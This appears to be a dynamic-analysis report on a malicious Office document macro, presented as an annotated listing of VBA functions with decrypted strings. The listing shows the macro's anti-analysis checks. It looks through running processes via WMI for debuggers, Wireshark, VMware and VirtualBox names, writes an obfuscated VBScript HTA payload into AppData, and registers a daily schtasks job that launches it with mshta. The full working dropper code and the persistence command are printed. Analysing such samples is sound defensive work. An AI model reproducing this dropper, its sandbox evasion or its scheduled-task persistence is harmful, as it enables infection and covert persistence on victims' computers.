
                LCase

                Name

                StringsDecrypted Strings
                "O55>55=<"
                "FZyTNy" "AUtOIt"
                "MfHPJW" "HaCKER"
                "M}I" "HxD"
                "Rfq\x7fNQqF"
                "Tqq~" "Olly"
                "Ut|JWxmjQqdnXJ" "PowERsheLl_iSE"
                "X\nslGt]" "SWingBoX"
                "Yhu[Nj\" "TcpVIeW"
                "[NxzFq%gFXnH" "VIsuAl bASiC"
                "[]xYWjfR" "VXsTReaM"
                "[gt}" "Vbox"
                "[rytTQxi" "VmtoOLsd"
                "[rytTqxi," "VmtoOlsd'"
                "\nWJXmFWP" "WiREShARK"
                "knIIQJw" "fiDDLEr"
                "mnofhp" "hijack"
                "niF" "idA"
                "rFQ|Fwj" "mALwAre"
                "uWthJ}U" "pRocExP"
                "uwTHJxx%j}uQtwjw" "prOCEss expLorer"
                "xjhzsnf" "secunia"
                "{R\fWJ" "vMWaRE"
                "{gt]YwF^" "vboXTrAY"
                "{rYtTqx" "vmToOls"
                "|NSRLryx?aa3awttyahnR[7" "wINMGmts:\\.\root\ciMV2"
                "XJQJHY%SfrJ%KWTR%\Ns87dUWtHJxX" "SELECT NamE FROM WIn32_PRoCEsS"
                "O56:=5<6"
                "O56:=5<6"
                "O56:=5<6"
                "O56:=5<6"
                "O56:=5<6"
                "O56:=5<6"
                LineInstructionMeta Information
                174

                Function KYEPC270() as String

                175

                Dim KYKC3920 as String

                executed
                176

                Dim lxkpcl as Object

                177

                Dim Madeir as Object

                178

                Dim MINUS as String

                179

                Dim mfh264enc as Integer

                181

                MINUS = "O55>55=<"

                182

                mfh264enc = 0

                184

                LTYPEBO = Array(MSART8("MfHPJW"), MSART8("Rfq\x7fNQqF"), MSART8("uWthJ}U"), MSART8("\nWJXmFWP"), MSART8("M}I"), MSART8("Ut|JWxmjQqdnXJ"), MSART8("niF"), MSART8("Tqq~"), MSART8("knIIQJw"), MSART8("rFQ|Fwj"), MSART8("[rytTQxi"), MSART8("X\nslGt]"), MSART8("{gt]YwF^"), MSART8("xjhzsnf"), MSART8("mnofhp"), MSART8("[rytTqxi,"), MSART8("[gt}"), MSART8("{R\fWJ"), MSART8("[]xYWjfR"), MSART8("FZyTNy"), MSART8("{rYtTqx"), MSART8("Yhu[Nj\"), MSART8("\nWJXmFWP"), MSART8("uwTHJxx%j}uQtwjw"), MSART8("[NxzFq%gFXnH"), MSART8("knIIQJw"))

                Array

                executed
                187

                Set lxkpcl = GetObject(MSART8("|NSRLryx?aa3awttyahnR[7"))

                GetObject("wINMGmts:\\.\root\ciMV2")

                executed
                188

                Set Madeir = lxkpcl.ExecQuery(MSART8("XJQJHY%SfrJ%KWTR%\Ns87dUWtHJxX"))

                SWbemServicesEx.ExecQuery("SELECT NamE FROM WIn32_PRoCEsS")

                executed
                190

                For Each McxDriv in Madeir

                191

                mfh264enc = mfh264enc + 1

                192

                For Each mf3216 in LTYPEBO

                193

                If InStr(LCase(McxDriv.Name), LCase(mf3216)) > 0 Then

                InStr("system idle process","hacker") -> 0

                LCase

                Name

                executed
                194

                MINUS = "O56:=5<6"

                195

                Endif

                196

                Next

                197

                Next

                199

                If mfh264enc < 40 Then

                200

                MINUS = "O56:=5<6"

                201

                Endif

                203

                KYEPC270 = MINUS

                204

                End Function

                Subroutine Frame1_Layout, APIs: 22, Strings: 7, Number of lines: 33, Relevance: 68.033
                APIsMeta Information

                Part of subcall function xrWPpb4@ThisDocument: WholeStory

                Part of subcall function xrWPpb4@ThisDocument: Font

                Part of subcall function xrWPpb4@ThisDocument: Select

                Part of subcall function wsepno@ThisDocument: Delete

                CreateObject

                		CreateObject("WsCRiPT.Shell")

                Part of subcall function MSART8@ThisDocument: Len

                CreateObject

                Part of subcall function MSART8@ThisDocument: Len

                Part of subcall function KYEPC270@ThisDocument: Array

                Part of subcall function KYEPC270@ThisDocument: GetObject

                Part of subcall function KYEPC270@ThisDocument: ExecQuery

                Part of subcall function KYEPC270@ThisDocument: InStr

                Part of subcall function KYEPC270@ThisDocument: LCase

                Part of subcall function KYEPC270@ThisDocument: Name

                Part of subcall function J0289430@ThisDocument: CreateObject

                Part of subcall function J0289430@ThisDocument: Environ

                Part of subcall function J0289430@ThisDocument: CreateTextFile

                Part of subcall function J0289430@ThisDocument: Write

                Part of subcall function J0289430@ThisDocument: Close

                Part of subcall function MSART8@ThisDocument: Len

                Replace

                		Replace("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta random_name"","random_name","C:\Users\borat\AppData\Roaming\WPFT532.hta") -> schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\borat\AppData\Roaming\WPFT532.hta"

                Part of subcall function NAPHLPR@ThisDocument: Run

                StringsDecrypted Strings
                "MtrjUwjrnzrJinynts"
                "\xHWnUY3Xmjqq" "WsCRiPT.Shell"
                "muh9;55y"
                "mui68;5y"
                "O55>55=<"
                "wfsitrdsfrj" "random_name"
                "wfsitrdsfrj" "random_name"
                LineInstructionMeta Information
                12

                Sub Frame1_Layout()

                13

                Dim test_startfile as String

                executed
                14

                Dim rawshark as Object

                15

                Dim OTKLOADR as Integer

                16

                Dim RS_NotDefault as String

                17

                Dim py25tests as String

                18

                Dim RGI79AD as String

                19

                Dim reindent as String

                20

                Dim RIABLC3 as String

                22

                test_startfile = "MtrjUwjrnzrJinynts"

                23

                py25tests = "\xHWnUY3Xmjqq"

                executed
                24

                xrWPpb4

                25

                wsepno

                26

                Dim UserDataBackup as Integer

                26

                UserDataBackup = 1

                27

                Dim TTYRES as Integer

                27

                TTYRES = UserDataBackup * 9

                28

                If UserDataBackup < TTYRES Then

                29

                test_startfile = py25tests

                30

                Set rawshark = CreateObject(MSART8(test_startfile))

                CreateObject("WsCRiPT.Shell")

                executed
                31

                Else

                32

                Set rawshark = CreateObject(MSART8(test_startfile))

                CreateObject

                33

                Endif

                34

                reindent = fstexp("muh9;55y")

                35

                RS_NotDefault = fixer_base("mui68;5y")

                36

                RGI79AD = KYEPC270

                37

                If (RGI79AD = "O55>55=<") Then

                executed
                38

                RIABLC3 = J0289430(reindent)

                39

                RIACMAC7 = MSART8("wfsitrdsfrj")

                executed
                40

                RS_NotDefault = Replace(RS_NotDefault, RIACMAC7, RIABLC3)

                Replace("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta random_name"","random_name","C:\Users\borat\AppData\Roaming\WPFT532.hta") -> schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\borat\AppData\Roaming\WPFT532.hta"

                executed
                41

                RS_NotDefault = NAPHLPR(rawshark, RS_NotDefault, OTKLOADR)

                42

                Endif

                43

                End Sub

                Function J0289430, APIs: 9, Strings: 3, Number of lines: 12, Relevance: 38.012
                APIsMeta Information

                CreateObject

                		CreateObject("SCRiPtING.FIleSyStEMObjECT")

                Part of subcall function MSART8@ThisDocument: Len

                Environ

                Part of subcall function MSART8@ThisDocument: Len

                Part of subcall function MSART8@ThisDocument: Len

                CreateTextFile

                		FileSystemObject.CreateTextFile("C:\Users\borat\AppData\Roaming\WPFT532.hta",True)

                Write

                		TextStream.Write("<html> <body> <script language="VBScript"> Sub TS_WindowsUpdate() WWAN_profile_v1 = 88 WcnEapAuthProxy = "\x7f{\xfffd\xfffdqx|V{\xfffdm\xfffd\xfffd" Set winrs = CreateObject(Uzhgoro(WcnEapAuthProxy)) ZPDIR4B = TN00217_("data1") ZPDIR4B = ts_generic(winrs, ZPDIR4B, WWAN_profile_v1) End Sub Function TN00217_(WcnEapAuthProxy) SV3202E3 = "\YHTHYZ\HTH[ZTH\^HT[ZHTH\XHTH[ZHT[^TH^aTHYYXHT`^HTH]`T^_HTH_aTHYXaHTH`[TH`XTHYXYHTHaaHTaYT]ZHTH\\HT]XTH]ZHT\\HT]XT][THa[HTH\]HTHYX^T_aHT_[HTYYXHT[aHTH[aTH\YQ\xfffd\xfffdHVHPHL\xfffd\xfffd\xfffdw\xfffd\xfffd\xfffdZY\xfffdSLx{p\xfffdu\xfffd\xfffd[X\xfffdSO\xfffdOQHNN{\xfffd\xfffdHH\xfffd\xfffdx\xfffdemkpwH\xfffd\xfffd~ws\xfffdUm\xfffdx" SV1331E3 = "z\xfffd\xfffd\xfffd\xfffdwvHHP\xfffd\xfffd\xfffdUq\xfffdmuH\xfffdv~bi\xfffd\xfffdQV\xfffd\xfffd\xfffd}\xfffdH\xfffd\xfffdH\xfffdw\x7fmz\xfffdpm\xfffdtHHU\xfffd\xfffdxz\xfffdnqHUm\xfffdm\xfffd\xfffd|\xfffdwv\xfffdw\xfffdqHj\xfffdxi{{HHU\xfffd\xfffdv\xfffdHHUv\xfffd\xfffd\xfffd\xfffdHU\x7f\xfffd\xfffd\xfffd\xfffd\x7f{\xfffd\xfffd\xfffdmHHpq\xfffdl\xfffd\xfffdHHHHUNNHH\xfffdb\xfffd\x7f\xfffdvlw\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd|mu[Z\xfffdk\xfffd\xfffdV\xfffd\xfffdmHHW\xfffdHM\xfffdv\xfffd\xfffdMJ" test_idlehistory = "THYXXHTHYY_THYYZHTHYXXTHa_HT[aHTH\[T[aHTHYY^HTYXYT[aHT\[T[aHTHYXaTHYY]HT\^TaaHTYYYTHYXaHTH\_TaaHTHYX\T[aTH\[T[aTHYXYTH[aHTH\[HTH[aTaaHTYX_HT\_TYX]HTYYXT[aHT\[HTH[aHTHYXXHTHYXYHTYZXT_ZTYX`THYX^TH\YT[aHT\[HT[aTH]ZTHYX^HTH[" sys_srv = "[THa[HTaYHTaaHTYX\T^]THYY\HTa[T]YTH]_HTH\YTH\^HT`ZTYXYTYYZT_^THa_TH^_HTYXYTH\XHTH\XTaYTaaTHYX\TH^]THYY\THa[TH][HT]XTH\[HTaYHTHaaHTYX\TH^]THYY\HTHa[T\aT\`T]\TH\[THaYHTaaTHYX\TH^]TYY\Ta[HTH\aHTH]XHT]XT\YT\\TH[aTHYZ\HTH[aHT" systemcpl = "aT\[T[aHTHYZZT_[HTH^aT``TH[aTH\YHT\^HT`ZHTYXYTHYYZTH_^HTHa_T^_TYXYTH\XHT\XHTaYHTHaaTHYX\T^]HTYY\HTa[T]]TH]XT\[HTaYTHaaTHYX\T^]HTHYY\THa[T\aT\`T]^TH\[TaYHTaaTHYX\T^]HTYY\Ta[T\aTH\`HT]\HTH\YTH\\TaYT`[TYY^HTHYY\TH_[HTYYXTYX" test_multibytecodec = "THYY^HTH\YT[aHTH\[HT[aT\^T[aT\[HT[aHTYXXHTHYYYTYYaHTHYYXHTYX`HTHYYYHT[aT\[HT[aTHa_HTHYXXTYY]HTYY^THYY\TYX]HTHYYXHTHYX[T\XHT_ZHTYX`TH[aT\[T[aTHYX^TYX\TYY^HTH[aHTH\[HTH[aHTHYY^HTYYZTH]`HTH[aTH\[T[aHTH\_TH\_THYXZHTYX]THYYXH" test__osx_support = "\xfffdb\xfffd\x7f\xfffdvlw\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd|mu[Z\xfffdk\xfffd\xfffdV\xfffd\xfffdmHHW\xfffdHHHJ{\xfffd\xfffdHHHi\xfffd\x7feHHU\xfffdwq\xfffd\xfffdkpi\xfffd\xfffd\xfffd\xfffdHP\XHT[aHTH\XHTH_`T[aTH\[T[aHTHYXYTHYYaTH\]TH_aT[aTH\[HT[aHTHa`TYX^HTHYXYHTaaHTYY^HTH[ZHTH_`TYXYHTHYY^HTH\^HT`_TH[aHTH\[TH[aHTYXYHTHa`HTHaaHTHYX`THYX]HTYXYHTYYX" winrs = test__osx_support & test_multibytecodec & test_idlehistory & systemcpl & sys_srv & SV3202E3 & SV1331E3 winrs = Uzhgoro(winrs) TN00217_ = winrs End Function Function ts_generic(WcnEapAuthProxy, winrs, WWAN_profile_v1 ) xmfbox = 5 ZPDIR4B = winrs If (WWAN_profile_v1 > xmfbox) Then xmfbox = WWAN_profile_v1 - WWAN_profile_v1 WcnEapAuthProxy.Run ZPDIR4B, xmfbox, True End If ZPDIR4B = "\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd" ts_generic = ZPDIR4B End Function Function Uzhgoro(verclsid ) viewprov = 40 For v_mscdsc = 1 To Len(verclsid) WB01740_ = WB01740_ & usertile25(verclsid, v_mscdsc, viewprov) Next Uzhgoro = WB01740_ End Function Function usertile25(usertile251, usertile252, usertile253) usertile25 = Chr(Asc(Mid(usertile251, usertile252, 1)) - usertile253) End Function TS_WindowsUpdate() window.close() </script> </body> </html>")

                Part of subcall function MSART8@ThisDocument: Len

                Close

                StringsDecrypted Strings
                "XHWnUyNSL3KNqjX~XyJRTgoJHY" "SCRiPtING.FIleSyStEMObjECT"
                "FUUIFYF" "APPDATA"
                "a\UKY:873myf" "\WPFT532.hta"
                LineInstructionMeta Information
                207

                Function J0289430(J0297551 as String) as String

                209

                Dim J0304405 as String

                executed
                210

                Dim KYC2525E as String

                211

                Dim KBDUGHR1 as String

                213

                Set objFSO = CreateObject(MSART8("XHWnUyNSL3KNqjX~XyJRTgoJHY"))

                CreateObject("SCRiPtING.FIleSyStEMObjECT")

                executed
                215

                KYC2525E = Environ(MSART8("FUUIFYF"))

                Environ

                executed
                216

                KBDUGHR1 = MSART8("a\UKY:873myf")

                executed
                218

                Set kerberos = objFSO.CreateTextFile(KYC2525E & KBDUGHR1, True)

                FileSystemObject.CreateTextFile("C:\Users\borat\AppData\Roaming\WPFT532.hta",True)

                executed
                219

                kerberos.Write MSART8(J0297551)

                TextStream.Write("<html> <body> <script language="VBScript"> Sub TS_WindowsUpdate() WWAN_profile_v1 = 88 WcnEapAuthProxy = "\x7f{\xfffd\xfffdqx|V{\xfffdm\xfffd\xfffd" Set winrs = CreateObject(Uzhgoro(WcnEapAuthProxy)) ZPDIR4B = TN00217_("data1") ZPDIR4B = ts_generic(winrs, ZPDIR4B, WWAN_profile_v1) End Sub Function TN00217_(WcnEapAuthProxy) SV3202E3 = "\YHTHYZ\HTH[ZTH\^HT[ZHTH\XHTH[ZHT[^TH^aTHYYXHT`^HTH]`T^_HTH_aTHYXaHTH`[TH`XTHYXYHTHaaHTaYT]ZHTH\\HT]XTH]ZHT\\HT]XT][THa[HTH\]HTHYX^T_aHT_[HTYYXHT[aHTH[aTH\YQ\xfffd\xfffdHVHPHL\xfffd\xfffd\xfffdw\xfffd\xfffd\xfffdZY\xfffdSLx{p\xfffdu\xfffd\xfffd[X\xfffdSO\xfffdOQHNN{\xfffd\xfffdHH\xfffd\xfffdx\xfffdemkpwH\xfffd\xfffd~ws\xfffdUm\xfffdx" SV1331E3 = "z\xfffd\xfffd\xfffd\xfffdwvHHP\xfffd\xfffd\xfffdUq\xfffdmuH\xfffdv~bi\xfffd\xfffdQV\xfffd\xfffd\xfffd}\xfffdH\xfffd\xfffdH\xfffdw\x7fmz\xfffdpm\xfffdtHHU\xfffd\xfffdxz\xfffdnqHUm\xfffdm\xfffd\xfffd|\xfffdwv\xfffdw\xfffdqHj\xfffdxi{{HHU\xfffd\xfffdv\xfffdHHUv\xfffd\xfffd\xfffd\xfffdHU\x7f\xfffd\xfffd\xfffd\xfffd\x7f{\xfffd\xfffd\xfffdmHHpq\xfffdl\xfffd\xfffdHHHHUNNHH\xfffdb\xfffd\x7f\xfffdvlw\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd|mu[Z\xfffdk\xfffd\xfffdV\xfffd\xfffdmHHW\xfffdHM\xfffdv\xfffd\xfffdMJ" test_idlehistory = "THYXXHTHYY_THYYZHTHYXXTHa_HT[aHTH\[T[aHTHYY^HTYXYT[aHT\[T[aHTHYXaTHYY]HT\^TaaHTYYYTHYXaHTH\_TaaHTHYX\T[aTH\[T[aTHYXYTH[aHTH\[HTH[aTaaHTYX_HT\_TYX]HTYYXT[aHT\[HTH[aHTHYXXHTHYXYHTYZXT_ZTYX`THYX^TH\YT[aHT\[HT[aTH]ZTHYX^HTH[" sys_srv = "[THa[HTaYHTaaHTYX\T^]THYY\HTa[T]YTH]_HTH\YTH\^HT`ZTYXYTYYZT_^THa_TH^_HTYXYTH\XHTH\XTaYTaaTHYX\TH^]THYY\THa[TH][HT]XTH\[HTaYHTHaaHTYX\TH^]THYY\HTHa[T\aT\`T]\TH\[THaYHTaaTHYX\TH^]TYY\Ta[HTH\aHTH]XHT]XT\YT\\TH[aTHYZ\HTH[aHT" systemcpl = "aT\[T[aHTHYZZT_[HTH^aT``TH[aTH\YHT\^HT`ZHTYXYTHYYZTH_^HTHa_T^_TYXYTH\XHT\XHTaYHTHaaTHYX\T^]HTYY\HTa[T]]TH]XT\[HTaYTHaaTHYX\T^]HTHYY\THa[T\aT\`T]^TH\[TaYHTaaTHYX\T^]HTYY\Ta[T\aTH\`HT]\HTH\YTH\\TaYT`[TYY^HTHYY\TH_[HTYYXTYX" test_multibytecodec = "THYY^HTH\YT[aHTH\[HT[aT\^T[aT\[HT[aHTYXXHTHYYYTYYaHTHYYXHTYX`HTHYYYHT[aT\[HT[aTHa_HTHYXXTYY]HTYY^THYY\TYX]HTHYYXHTHYX[T\XHT_ZHTYX`TH[aT\[T[aTHYX^TYX\TYY^HTH[aHTH\[HTH[aHTHYY^HTYYZTH]`HTH[aTH\[T[aHTH\_TH\_THYXZHTYX]THYYXH" test__osx_support = "\xfffdb\xfffd\x7f\xfffdvlw\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd|mu[Z\xfffdk\xfffd\xfffdV\xfffd\xfffdmHHW\xfffdHHHJ{\xfffd\xfffdHHHi\xfffd\x7feHHU\xfffdwq\xfffd\xfffdkpi\xfffd\xfffd\xfffd\xfffdHP\XHT[aHTH\XHTH_`T[aTH\[T[aHTHYXYTHYYaTH\]TH_aT[aTH\[HT[aHTHa`TYX^HTHYXYHTaaHTYY^HTH[ZHTH_`TYXYHTHYY^HTH\^HT`_TH[aHTH\[TH[aHTYXYHTHa`HTHaaHTHYX`THYX]HTYXYHTYYX" winrs = test__osx_support & test_multibytecodec & test_idlehistory & systemcpl & sys_srv & SV3202E3 & SV1331E3 winrs = Uzhgoro(winrs) TN00217_ = winrs End Function Function ts_generic(WcnEapAuthProxy, winrs, WWAN_profile_v1 ) xmfbox = 5 ZPDIR4B = winrs If (WWAN_profile_v1 > xmfbox) Then xmfbox = WWAN_profile_v1 - WWAN_profile_v1 WcnEapAuthProxy.Run ZPDIR4B, xmfbox, True End If ZPDIR4B = "\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd" ts_generic = ZPDIR4B End Function Function Uzhgoro(verclsid ) viewprov = 40 For v_mscdsc = 1 To Len(verclsid) WB01740_ = WB01740_ & usertile25(verclsid, v_mscdsc, viewprov) Next Uzhgoro = WB01740_ End Function Function usertile25(usertile251, usertile252, usertile253) usertile25 = Chr(Asc(Mid(usertile251, usertile252, 1)) - usertile253) End Function TS_WindowsUpdate() window.close() </script> </body> </html>")

                executed
                220

                kerberos.Close

                Close

                221

                J0289430 = KYC2525E & KBDUGHR1

                222

                End Function

                Function NAPHLPR, APIs: 1, Strings: 1, Number of lines: 16, Relevance: 14.016
                APIsMeta Information

                Run

                		IWshShell3.Run("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\borat\AppData\Roaming\WPFT532.hta"",0,True) -> 0 IWshShell3.Run("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\borat\AppData\Roaming\WPFT532.hta"",0,True)
                StringsDecrypted Strings
                "nsktfirs"
                LineInstructionMeta Information
                124

                Function NAPHLPR(net1qx64 as Object, NAPHLPR2 as String, nullcert as Integer) as String

                125

                Dim OmdProject as String

                executed
                126

                Dim NR2550B as String

                127

                OmdProject = NAPHLPR2

                128

                NR2550B = OmdProject

                129

                Dim vmstorfl as Integer

                129

                vmstorfl = 81

                130

                Dim vdsbas as Integer

                130

                vdsbas = 9

                131

                If vmstorfl > vdsbas Then

                132

                nullcert = GRAPH(nullcert, NR2550B)

                133

                net1qx64.Run OmdProject, nullcert, True

                IWshShell3.Run("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\borat\AppData\Roaming\WPFT532.hta"",0,True) -> 0

                executed
                134

                Endif

                135

                OmdProject = "nsktfirs"

                136

                NAPHLPR = OmdProject

                137

                End Function

                Function fixer_base, APIs: 1, Strings: 4, Number of lines: 11, Relevance: 10.511
                APIsMeta Information

                Part of subcall function MSART8@ThisDocument: Len

                StringsDecrypted Strings
                "xhmyfxpx%4Hwjfyj%4K%4XH%IFNQ^%4XY%'65?75'%4YS%'Iwn{jHqtziYfxpHtwjHmjhp'%4YW%'rxmyf%wfsitrdsfrj'" "schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta random_name""
                "muo9:55y"
                "NK6987J8"
                "MU_;W\S<"
                LineInstructionMeta Information
                45

                Function fixer_base(test_startfile2 as String) as String

                46

                Dim SL00286_ as String

                executed
                47

                Dim FD00077_ as String

                48

                FD00077_ = "xhmyfxpx%4Hwjfyj%4K%4XH%IFNQ^%4XY%'65?75'%4YS%'Iwn{jHqtziYfxpHtwjHmjhp'%4YW%'rxmyf%wfsitrdsfrj'"

                executed
                50

                test_startfile2 = "muo9:55y"

                51

                SL00286_ = "NK6987J8"

                52

                test_startfile2 = "MU_;W\S<"

                53

                SL00286_ = FD00077_

                54

                SL00286_ = MSART8(SL00286_)

                55

                fixer_base = SL00286_

                56

                End Function

                Function fstexp, APIs: 0, Strings: 31, Number of lines: 64, Relevance: 38.814
                StringsDecrypted Strings
                "fYM^]aYcbMY^^aMYf`YbbYMb]Ya`MYf^YMffYM^]aYcbMYM^^aYMf`YafYaeYbcYMa`Yf^MYffYM^]aYcbMY^^aYf`YafYMaeMYb"
                "jwynqj7:8.\x0fJsi%Kzshynts\x0fYXd\nsit|xZuifyj-.\x0f|nsit|3hqtxj-.\x0fA4xhwnuyC\x0fA4gti~C\x0fA4myrqC"
                "^MYMfeMYMffMYM^]eYM^]bMY^]^MY^^]'\x12\x0f\x0f\x0e|nswx%B%yjxyddtx}dxzuutwy%+%yjxydrzqyng~yjhtijh%+%yjxydniqjmnxy"
                "fMY^]]MYM^^^Y^^fMYM^^]MY^]eMYM^^^MY`fYa`MY`fYMfdMYM^]]Y^^bMY^^cYM^^aY^]bMYM^^]MYM^]`Ya]MYd_MY^]eYM`f"
                "r\x2122yMMZ\x203a\x0153}\x7f\x0153svMZr\x2026r\x90\xa2\x81\x2013|{\x9d|\x2122vMo\x2020}n\x20ac\x20acMMZ\x203a\x0153{\x2013MMZ{\x0153\x2019\x2026\x2013MZ\x201e\x2013\x203a\x2018\x0153\x201e\x20ac\xa1\x2020\x2122rMMuv\x2018q\x2019\x203aMMMMZSSMM\x90g\x2030\x201e\x2013{q|\xa4\xa0\x2030\xa0\x2020\xa0\x81rz`_\x2030"
                "AmyrqC\x0fAgti~C\x0fAxhwnuy%qfslzfljB'[GXhwnuy'C\x0f\x0fXzg%YXd\nsit|xZuifyj-.\x0f\x0e\\FSduwtknqjd{6%B%==\x0f\x0e\hsJfuFzym"
                "z\x2019\x02c6`]\x0160XT\xa5TVMSS\x20ac\x2019\xa1MM\x201d\x203a}\x017ejrpu|M\x2013\x203a\x0192|x\x2019Zr\xa5}'\x12\x0f\x0e\x0eX[6886J8%B%'\x7f\x2019\xa0\xa0\x2013|{MMU\x201d\x2019\xa1Zv\xa1rzM\x2019{\x0192gn\x2020\xa4V[\xa3\x017d\x2122\x201a\x2019M\x2039\xa9M\x9d|\x201er\x7f\xa0u"
                "'\x12\x0f\x0e\x0ex~xyjrhuq%B%'fYa`Y`fMYM^__Yd`MYMcfYeeYM`fYMa^MYacMYe_MY^]^YM^^_YMdcMYMfdYcdY^]^YMa]MYa]MYf^MYMf"
                "zxjwynqj7:-{jwhqxni1%{drxhixh1%{nj|uwt{.\x0f\x0eSj}y\x0f\x0eZ\x7fmltwt%B%\G56<95d\x0fJsi%Kzshynts\x0f\x0fKzshynts%zxjwynqj7:"
                "tw~%+%x~xyjrhuq%+%x~xdxw{%+%X[8757J8%+%X[6886J8\x0f\x0e|nswx%B%Z\x7fmltwt-|nswx.\x0f\x0eYS5576<d%B%|nswx\x0fJsi%Kzshyn"
                "a`MYM`fMYM^]]MYM^]^MY^_]Yd_Y^]eYM^]cYMa^Y`fMYa`MY`fYMb_YM^]cMYM`'\x12\x0f\x0e\x0ex~xdxw{%B%'`YMf`MYf^MYffMY^]aYc"
                "aMYMa^YMaaYf^Ye`Y^^cMYM^^aYMd`MY^^]Y^]'\x12\x0f\x0e\x0eyjxydrzqyng~yjhtijh%B%'YM^^cMYMa^Y`fMYMa`MY`fYacY`fYa`MY`"
                "bYM^^aMYf`Yb^YMbdMYMa^YMacMYe_Y^]^Y^^_YdcYMfdYMcdMY^]^YMa]MYMa]Yf^YffYM^]aYMcbYM^^aYMf`YMb`MYb]YMa`M"
                "Yf^MYMffMY^]aYMcbYM^^aMYMf`YafYaeYbaYMa`YMf^MYffYM^]aYMcbY^^aYf`MYMafMYMb]MYb]Ya^YaaYM`fYM^_aMYM`fMY"
                "ts\x0f\x0fKzshynts%yxdljsjwnh-\hsJfuFzymUwt}~1%|nswx1%\\FSduwtknqjd{6%.\x0f\x0e}rkgt}%B%:\x0f\x0e_UINW9G%B%|nswx\x0f%%%%N"
                "Ya`Y`fYM^]cY^]aY^^cMYM`fMYMa`MYM`fMYM^^cMY^^_YMbeMYM`fYMa`Y`fMYMadYMadYM^]_MY^]bYM^^]M'\x12\x0f\x0e\x0eyjxyddtx}"
                "p\x0161\x2018[\x2019\x2026rMM\\x90MR\x201d{\x9d\x017eRO'\x12\x0f\x0e\x0eyjxydniqjmnxytw~%B%'YM^]]MYM^^dYM^^_MYM^]]YMfdMY`fMYMa`Y`fMYM^^cMY^]^Y`fMYa`"
                "shynts%Z\x7fmltwt-{jwhqxni%.\x0f\x0e{nj|uwt{%B%95\x0f\x0eKtw%{drxhixh%B%6%Yt%Qjs-{jwhqxni.\x0f\x0e\x0e\G56<95d%B%\G56<95d%+%"
                "-zxjwynqj7:61%zxjwynqj7:71%zxjwynqj7:8.\x0f\x0ezxjwynqj7:%B%Hmw-Fxh-Rni-zxjwynqj7:61%zxjwynqj7:71%6..%2%zx"
                "}~.%\x0f\x0e\x0eX[8757J8%B%'a^MYM^_aMYM`_YMacMY`_MYMa]MYM`_MY`cYMcfYM^^]MYecMYMbeYcdMYMdfYM^]fMYMe`YMe]YM^]^M"
                "MYM^]^YM^^fYMabYMdfY`fYMa`MY`fMYMfeY^]cMYM^]^MYffMY^^cMYM`_MYMdeY^]^MYM^^cMYMacMYedYM`fMYMa`YM`fMY^]"
                "f6'.\x0f\x0e_UINW9G%B%yxdljsjwnh-|nswx1%_UINW9G1%\\FSduwtknqjd{6.\x0fJsi%Xzg\x0f\x0fKzshynts%YS5576<d-\hsJfuFzymUwt"
                "Uwt}~%B%'\x201e\x20ac\x90\x0178v}\x81[\x20ac\x2022r\x2122\x2122'\x0f\x0eXjy%|nswx%B%HwjfyjTgojhy-Z\x7fmltwt-\hsJfuFzymUwt}~..\x0f\x0e_UINW9G%B%YS5576<d-'ify"
                "YMffMYf^Yb_MYMaaMYb]YMb_MYaaMYb]Yb`YMf`MYMabMYM^]cYdfMYd`MY^^]MY`fMYM`fYMa^V\x2039\xa9M[MUMQ\x9d\xa0\x2022|\x0161\x2019\x02c6_^\x0160XQ}\x20acu\x0153"
                "%_UINW9G1%}rkgt}1%Ywzj\x0f\x0eJsi%Nk\x0f\x0e_UINW9G%B%'\xa2\xa0\x2019\x0178\x9d\x2122\xa2\x201d\x9d\x2122\x017d\xa6\x2019\xa1\xa4'\x0f\x0eyxdljsjwnh%B%_UINW9G\x0fJsi%Kzshynts\x0f\x0f\x0f\x0fKz"
                "Y`fMYM^]fYM^^bMYacYffMY^^^YM^]fMYMadYffMYM^]aY`fYMa`Y`fYM^]^YM`fMYMa`MYM`fYffMY^]dMYadY^]bMY^^]Y`fMY"
                "k%-\\FSduwtknqjd{6%C%}rkgt}.%Ymjs\x0f\x0e\x0e}rkgt}%B%\\FSduwtknqjd{6%2%\\FSduwtknqjd{6\x0f\x0e\x0e\hsJfuFzymUwt}~3Wzs"
                "dxzuutwy%B%'\x90g\x2030\x201e\x2013{q|\xa4\xa0\x2030\xa0\x2020\xa0\x81rz`_\x2030p\x0161\x2018[\x2019\x2026rMM\\x90MMMO\x20ac\x2019\xa1MMMn\x2020\x201ejMMZ\x2014|v\x203a\x02c6pun\x0178\x02c6\x0160\x0160MUa]MY`fMYMa]MYMdeY`fYMa`Y`f"
                "nhfhqx"
                "NK6987J8"
                "NRYHHTWJ"
                LineInstructionMeta Information
                58

                Function fstexp(test_startfile02 as String) as String

                59

                Dim SO02269_ as String

                executed
                60

                Dim dnsext as String

                61

                Dim dismcoreps as String

                62

                Dim EP0NGJ8F as String

                63

                Dim CREDITS as String

                64

                Dim CscMigDl as String

                65

                Dim docomo as String

                66

                Dim compdyn as String

                67

                Dim displayswitch as String

                68

                Dim DGPICCAP as String

                69

                Dim dvdburn as String

                70

                Dim DISTLSTS as String

                71

                Dim common as String

                72

                Dim cordiaz as String

                73

                Dim EP0NCA9A as String

                74

                Dim controller as String

                75

                Dim dependency_links as String

                76

                Dim DigitalLocker as String

                77

                Dim dicowan as String

                78

                Dim dfdll_dll_x8 as String

                79

                Dim dispdiag as String

                80

